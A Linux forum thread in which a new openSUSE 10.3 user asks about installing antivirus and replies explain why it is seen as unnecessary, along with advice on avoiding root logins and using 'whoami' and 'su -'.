Step by step AV install Guide Plz..

Hi, i’m new with this open suse 10.3, what and how do i install AV, plz guide me.
Tq

what do you mean by AV? Anti-virus? If so, there’s no real need at the moment to run an antivirus software on Linux (unless you’re using your machine as a mail server for windows boxes)

Yes Anti Virus.
So, i don’t need it huh?Will it be ok and why is that?
Thanks

At the moment, virusses are not a threat to linux. First there are no real virusses for linux, second is the separation between the system and the users. That’s why users in this forum keep on telling you NOT TO LOGIN AS ROOT, and certainly not to go browsing the internet as root: root is the omnipotent system user.

If you don’t understand it all, accept it for now. Like you accepted that you did need an AV when running Windows. Ever sent a mail to Microsoft asking them why they make an operating system that’s vulnerable to virusses? :wink:

ok, i accept it.
How do i know NOT TO LOGIN AS ROOT?Am i login as a root now?coz every time i boot its automatically log in and ready to use.
Sorry for the trouble, newbie here.

If it logs in automatically, then you’re fine. If you ever aren’t sure, get to a terminal and type ‘whoami’. If it says root you’re root - nobody else has superuser powers unless you’ve deliberately given them to them.

Basically, log in with your normal username everywhere. If you need to do something that it won’t let you do, either open a root terminal, or open a normal terminal and run ‘su -’ and ‘exit’ when you’re done. That way you’re limiting the root powers to what you actually need them for, rather than running a whole graphical environment as root - a recipe for disaster.

If you need to do maintenance, booting into runlevel 3 (typing ‘3’ in the kernel parameters box in grub) and logging in as root is harmless - but you wouldn’t want to do it all the time.